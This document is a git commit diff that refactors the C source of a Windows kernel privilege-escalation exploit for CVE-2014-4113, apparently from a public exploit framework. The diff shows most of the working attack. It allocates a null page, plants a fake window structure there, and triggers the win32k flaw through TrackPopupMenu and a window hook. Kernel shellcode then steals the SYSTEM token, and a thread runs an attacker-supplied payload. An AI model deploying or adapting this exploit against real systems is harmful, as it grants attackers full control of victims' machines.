More code tidy and unifying of stuff

OJ · OJ · commit 6f3b373f017d · 2014-10-28T08:37:49.000+10:00
diff --git a/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c b/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c
@@ -13,6 +13,7 @@
 #undef WIN32_NO_STATUS
 
 #ifdef DEBUGGING
+// only needed because of the output printf stuff when debugging
 #include <stdio.h>
 #endif
 
@@ -21,19 +22,8 @@ typedef __success(return >= 0) LONG NTSTATUS;
 typedef NTSTATUS *PNTSTATUS;
 #endif
 
-#ifdef _M_X64
-typedef unsigned __int64 QWORD;
-typedef QWORD *PQWORD;
-#endif
-
 #define PTR_SIZE sizeof(UINT_PTR)
 
-int WndProcClue = 0;
-int HookCallbackClue = 0;
-WNDPROC lpPrevWndFunc;
-DWORD MyProcessId = 0;
-DWORD OffsetWindows = 0;
-
 typedef NTSTATUS(NTAPI *lNtAllocateVirtualMemory)(
 	IN  HANDLE  ProcessHandle,
 	IN  PVOID   *BaseAddress,
@@ -75,13 +65,20 @@ typedef struct _SYSTEM_MODULE_INFORMATION
 	SYSTEM_MODULE        Modules[0];
 } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
 
+BOOL bWndProcFlag = FALSE;
+BOOL bHookCallbackFlag = FALSE;
+
+WNDPROC lpPrevWndFunc;
+DWORD dwMyProcessId = 0;
+DWORD dwOffsetWindows = 0;
+
 lPsLookupProcessByProcessId pPsLookupProcessByProcessId = NULL;
 lNtAllocateVirtualMemory pNtAllocateVirtualMemory = NULL;
 
 #ifdef DEBUGGING
 void LogMessage(char* pszFormat, ...)
 {
-	static char s_acBuf[2048];
+	char s_acBuf[2048];
 	va_list args;
 	va_start(args, pszFormat);
 	vsprintf_s(s_acBuf, sizeof(s_acBuf) - 1, pszFormat, args);
@@ -101,9 +98,9 @@ long CALLBACK HookCallbackTwo(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
 
 LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam)
 {
-	if (*(DWORD *)(lParam + PTR_SIZE * 2) == 0x1EB && !HookCallbackClue)
+	if (*(DWORD *)(lParam + PTR_SIZE * 2) == 0x1EB && !bHookCallbackFlag)
 	{
-		HookCallbackClue = 1;
+		bHookCallbackFlag = TRUE;
 		if (UnhookWindowsHook(WH_CALLWNDPROC, HookCallback))
 		{
 			lpPrevWndFunc = (WNDPROC)SetWindowLongPtrA(*(HWND *)(lParam + PTR_SIZE * 3), GWLP_WNDPROC, (ULONG_PTR)HookCallbackTwo);
@@ -114,47 +111,45 @@ LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam)
 
 LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
 {
-	if (msg == 289 && WndProcClue != 1)
+	if (msg == 289 && !bWndProcFlag)
 	{
-		WndProcClue = 1;
+		bWndProcFlag = TRUE;
 		PostMessageA(hwnd, 256, 40, 0);
 		PostMessageA(hwnd, 256, 39, 0);
 		PostMessageA(hwnd, 513, 0, 0);
 	}
 	return DefWindowProc(hwnd, msg, wParam, lParam);
 }
 
+DWORD_PTR __stdcall get_threadinfo_ptr(void)
+{
 #ifdef _M_X64
-QWORD MyPtiCurrent(void) {
 	void *teb = (void *)__readgsqword(0x30);
-	QWORD Win32ThreadInfo = (QWORD)*((PQWORD)((PBYTE)teb + 0x78));
+	DWORD_PTR Win32ThreadInfo = (DWORD_PTR)*((PDWORD_PTR)((PBYTE)teb + 0x78));
 
 	return Win32ThreadInfo;
-}
 #else
-DWORD __stdcall MyPtiCurrent()
-{
 	__asm {
 		mov eax, fs : 18h
 		mov eax, [eax + 40h]
 	}
-}
 #endif
+}
 
 int _stdcall shellcode_ring0(int one, int two, int three, int four)
 {
 	void *my_process_info = NULL;
 	void *system_info = NULL;
 
-	pPsLookupProcessByProcessId((HANDLE)MyProcessId, &my_process_info);
+	pPsLookupProcessByProcessId((HANDLE)dwMyProcessId, &my_process_info);
 	pPsLookupProcessByProcessId((HANDLE)4, &system_info);
 
-	*(PDWORD)((PBYTE)my_process_info + OffsetWindows) = *(PDWORD)((PBYTE)system_info + OffsetWindows);
+	*(PDWORD)((PBYTE)my_process_info + dwOffsetWindows) = *(PDWORD)((PBYTE)system_info + dwOffsetWindows);
 
 	return 0;
 }
 
-DWORD WINAPI ExecutePayload(LPVOID lpPayload)
+DWORD WINAPI execute_payload(LPVOID lpPayload)
 {
 	VOID(*lpCode)() = (VOID(*)())lpPayload;
 	lpCode();
@@ -165,7 +160,7 @@ void Win32kNullPage(LPVOID lpPayload)
 {
 	HWND hWnd;
 	WNDCLASSA WndClass;
-	LPBYTE promise_land = NULL;
+	LPBYTE lpPromisedLand = NULL;
 	HMODULE hNtdll = NULL;
 	HMODULE ntkrnl = NULL;
 	NTSTATUS status;
@@ -192,7 +187,7 @@ void Win32kNullPage(LPVOID lpPayload)
 	{
 		// Ex: Windows 7 SP1
 		LogMessage("[*] Windows 6.1 found...");
-		OffsetWindows = 0x208;
+		dwOffsetWindows = 0x208;
 	}
 #else
 	if (VersionInformation.dwMajorVersion == 6)
@@ -201,13 +196,13 @@ void Win32kNullPage(LPVOID lpPayload)
 		{
 			// Ex: Windows 7 SP1
 			LogMessage("[*] Windows 6.1 found...");
-			OffsetWindows = 0xf8;
+			dwOffsetWindows = 0xf8;
 		}
 		else if (!VersionInformation.dwMinorVersion)
 		{
 			// Ex: Windows 2008 R2
 			LogMessage("[*] Windows 6.0 found...");
-			OffsetWindows = 0xe0;
+			dwOffsetWindows = 0xe0;
 		}
 		else
 		{
@@ -219,13 +214,13 @@ void Win32kNullPage(LPVOID lpPayload)
 	{
 		if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows XP SP3
 			LogMessage("[*] Windows 5.1 found...");
-			OffsetWindows = 0xc8;
+			dwOffsetWindows = 0xc8;
 		}
 		else if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 2)
 		{
 			// Ex: Windows 2003 SP2
 			LogMessage("[*] Windows 5.2 found...");
-			OffsetWindows = 0xd8;
+			dwOffsetWindows = 0xd8;
 		}
 		else
 		{
@@ -267,7 +262,6 @@ void Win32kNullPage(LPVOID lpPayload)
 	LogMessage("[*] Requesting Kernel loaded modules...");
 
 	status = pZwQuerySystemInformation(11, &SystemInfoBufferSize, 0, &SystemInfoBufferSize);
-
 	if (SystemInfoBufferSize == 0)
 	{
 		LogMessage("[!] Requesting pZwQuerySystemInformation required length failed");
@@ -291,7 +285,6 @@ void Win32kNullPage(LPVOID lpPayload)
 		return;
 	}
 
-
 	LogMessage("[*] Parsing SYSTEM_INFO...");
 
 	SYSTEM_MODULE_INFORMATION *smi = (SYSTEM_MODULE_INFORMATION *)pSystemInfoBuffer;
@@ -340,7 +333,7 @@ void Win32kNullPage(LPVOID lpPayload)
 	pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((DWORD_PTR)nt_base + ((DWORD_PTR)pPsLookupProcessByProcessId - (DWORD_PTR)ntkrnl));
 	LogMessage("[*] pPsLookupProcessByProcessId in kernel: 0x%p\n", pPsLookupProcessByProcessId);
 
-	MyProcessId = GetCurrentProcessId();
+	dwMyProcessId = GetCurrentProcessId();
 
 	// Register Class
 	LogMessage("[*] Registering class...");
@@ -369,134 +362,127 @@ void Win32kNullPage(LPVOID lpPayload)
 
 	LogMessage("[*] Allocating null page...");
 #ifdef _M_X64
-	ULONGLONG base_address = 0x00000000fffffffb;
+	ULONGLONG dwBaseAddress = 0x00000000fffffffb;
 #else
-	DWORD base_address = 1;
+	DWORD dwBaseAddress = 1;
 #endif
-	SIZE_T region_size = 0x1000;
-	ULONG zero_bits = 0;
-	HANDLE current_process = NULL;
-
-	current_process = GetCurrentProcess();
 
+	SIZE_T sRegionSize = 0x1000;
 	ULONG ulAllocationType = MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN;
-	if (pNtAllocateVirtualMemory(current_process, (LPVOID*)&base_address, 0, &region_size, ulAllocationType, PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS)
+
+	if (pNtAllocateVirtualMemory(GetCurrentProcess(), (LPVOID*)&dwBaseAddress, 0, &sRegionSize, ulAllocationType, PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS)
 	{
 		LogMessage("[!] Failed to allocate null page");
 		return;
 	}
 
 	LogMessage("[*] Getting PtiCurrent...");
 
-#ifdef _M_X64
-	DWORD_PTR pti = MyPtiCurrent();
-#else
-	DWORD pti = MyPtiCurrent();
-#endif
+	DWORD_PTR dwThreadInfoPtr = get_threadinfo_ptr();
 
-	if (pti == 0)
+	if (dwThreadInfoPtr == 0)
 	{
 		LoadLibrary("user32.dll");
 		LoadLibrary("gdi32.dll");
-		pti = MyPtiCurrent();
+		dwThreadInfoPtr = get_threadinfo_ptr();
 	}
 
-	if (pti == 0)
+	if (dwThreadInfoPtr == 0)
 	{
-		LogMessage("[!] Filed to get PtiCurrent");
+		LogMessage("[!] Filed to get current thread information");
 		return;
 	}
 
-	LogMessage("[*] Good! pti 0x%p", pti);
+	LogMessage("[*] Good! dwThreadInfoPtr 0x%p", dwThreadInfoPtr);
 	LogMessage("[*] Creating a fake structure at NULL...");
 
+	LPVOID lpPtr = NULL;
 #ifdef _M_X64
-	void *test = NULL;
-	(QWORD)test = 0x10000000B;
-	*((PQWORD)test) = pti;
+	(DWORD_PTR)lpPtr = 0x10000000B;
+	*((PDWORD_PTR)lpPtr) = dwThreadInfoPtr;
 
 	/* win32k!tagWND->bServerSideWindowProc = TRUE */
-	(QWORD)test = 0x100000025;
-	*((PBYTE)test) = 4;
+	(DWORD_PTR)lpPtr = 0x100000025;
+	*((PBYTE)lpPtr) = 4;
 
 	/* win32k!tagWND->lpfnWndProc = &shellcode_ring0 */
-	(QWORD)test = 0x10000008B;
-	*((PQWORD)test) = (QWORD)&shellcode_ring0;
+	(DWORD_PTR)lpPtr = 0x10000008B;
+	*((PDWORD_PTR)lpPtr) = (DWORD_PTR)shellcode_ring0;
 #else
-	void *test = promise_land + 3;
+	lpPtr = lpPromisedLand + 3;
 	/* We need to save this check, otherwise unmapped memory will be dereferenced (blue screen)
 	.text:BF8B93F4 02C mov     edi, _gptiCurrent
 	.text:BF8B93FA 02C cmp     edi, [esi + 8];
 	.text:BF8B93FD 02C jz      loc_BF8B
 	*/
-	*(LPDWORD)test = pti;
+	*(LPDWORD)lpPtr = dwThreadInfoPtr;
 
-	*((LPBYTE)(promise_land + 0x11)) = 0x4;
+	*((LPBYTE)(lpPromisedLand + 0x11)) = 0x4;
 
-	test = promise_land + 0x5b;
-	*(LPDWORD)test = (DWORD)shellcode_ring0;
+	lpPtr = lpPromisedLand + 0x5b;
+	*(LPDWORD)lpPtr = (DWORD)shellcode_ring0;
 #endif
 
 	// Exploit!
 
 	LogMessage("[*] Triggering vulnerability...");
-	HMENU MenuOne = CreatePopupMenu();
-	if (MenuOne == NULL)
+	HMENU hMenuOne = CreatePopupMenu();
+	if (hMenuOne == NULL)
 	{
 		LogMessage("[!] First CreatePopupMenu failed");
 		return;
 	}
 
-	MENUITEMINFOA MenuOneInfo;
-	memset(&MenuOneInfo, 0, sizeof(MENUITEMINFOA));
-	MenuOneInfo.cbSize = sizeof(MENUITEMINFOA);
-	MenuOneInfo.fMask = MIIM_STRING;
+	MENUITEMINFOA menuOneInfo;
+	memset(&menuOneInfo, 0, sizeof(MENUITEMINFOA));
+	menuOneInfo.cbSize = sizeof(MENUITEMINFOA);
+	menuOneInfo.fMask = MIIM_STRING;
 
-	if (InsertMenuItemA(MenuOne, 0, TRUE, &MenuOneInfo) != TRUE)
+	if (InsertMenuItemA(hMenuOne, 0, TRUE, &menuOneInfo) != TRUE)
 	{
 		LogMessage("[!] First InsertMenuItemA failed");
-		DestroyMenu(MenuOne);
+		DestroyMenu(hMenuOne);
 		return;
 	}
 
-	HMENU MenuTwo = CreatePopupMenu();
-	if (MenuTwo == NULL)
+	HMENU hMenuTwo = CreatePopupMenu();
+	if (hMenuTwo == NULL)
 	{
 		LogMessage("[!] Second CreatePopupMenu failed");
-		DestroyMenu(MenuOne);
+		DestroyMenu(hMenuOne);
 		return;
 	}
 
-	MENUITEMINFOA MenuTwoInfo;
-	memset(&MenuTwoInfo, 0, sizeof(MENUITEMINFOA));
-	MenuTwoInfo.cbSize = sizeof(MENUITEMINFOA);
-	MenuTwoInfo.fMask = (MIIM_STRING | MIIM_SUBMENU);
-	MenuTwoInfo.dwTypeData = "";
-	MenuTwoInfo.cch = 1;
-	MenuTwoInfo.hSubMenu = MenuOne;
+	MENUITEMINFOA menuTwoInfo;
+	memset(&menuTwoInfo, 0, sizeof(MENUITEMINFOA));
+	menuTwoInfo.cbSize = sizeof(MENUITEMINFOA);
+	menuTwoInfo.fMask = (MIIM_STRING | MIIM_SUBMENU);
+	menuTwoInfo.dwTypeData = "";
+	menuTwoInfo.cch = 1;
+	menuTwoInfo.hSubMenu = hMenuOne;
 
-	if (InsertMenuItemA(MenuTwo, 0, TRUE, &MenuTwoInfo) != TRUE)
+	if (InsertMenuItemA(hMenuTwo, 0, TRUE, &menuTwoInfo) != TRUE)
 	{
 		LogMessage("[!] Second InsertMenuItemA failed");
-		DestroyMenu(MenuTwo);
-		DestroyMenu(MenuOne);
+		DestroyMenu(hMenuTwo);
+		DestroyMenu(hMenuOne);
 		return;
 	}
 
 	if (SetWindowsHookExA(WH_CALLWNDPROC, HookCallback, NULL, GetCurrentThreadId()) == NULL)
 	{
 		LogMessage("[!] SetWindowsHookExA failed :-(\n");
-		DestroyMenu(MenuTwo);
-		DestroyMenu(MenuOne);
+		DestroyMenu(hMenuTwo);
+		DestroyMenu(hMenuOne);
 		return;
 	}
 
 	// 'crash' it!
-	TrackPopupMenu(MenuTwo, 0, -10000, -10000, 0, hWnd, NULL);
+	TrackPopupMenu(hMenuTwo, 0, -10000, -10000, 0, hWnd, NULL);
 
 	// If everything worked process should be privileges at this point
 	LogMessage("[!] Executing payload...");
-	CreateThread(0, 0, ExecutePayload, lpPayload, 0, NULL);
+	CreateThread(0, 0, execute_payload, lpPayload, 0, NULL);
 }
 
 BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
